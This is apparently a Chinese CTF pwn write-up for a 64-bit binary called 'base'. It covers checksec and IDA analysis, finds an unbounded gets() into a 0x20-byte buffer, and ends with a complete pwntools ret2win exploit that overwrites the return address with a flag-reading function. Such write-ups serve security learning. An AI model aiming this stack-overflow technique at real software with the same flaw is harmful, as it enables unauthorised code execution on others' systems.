https://dirtycow.cn/category/Pwn/ https://dirtycow.cn/187.html 2023-12-19T20:22:00+08:00 base思路：checksec查看程序 开了NX保护image-20231219194716217.png直接脱ida简单分析一下image-20231219200214179.png在49行程序gets了用户输入到inputimage-20231219200424823.png发现input的大小是0x20shift+f12查看字符串 发现了flag.txtimage-20231219201516217.png跟进去查看 推测是读取flag的函数 函数的地址是0x40490Dimage-20231219201617949.png接下来我们构造payload因为是64位程序 所以要用8个字节覆盖rbppayload = b'A'*0x20 + b'B'*8 + p64(0x40490D+1)exp：from pwn import * p = process('./base') payload = b"A" * 0x20 + b"B" * 8 + p64(0x40490D+1) p.sendline(b'1') p.sendline(payload) p.interactive() image-20231219202123415.png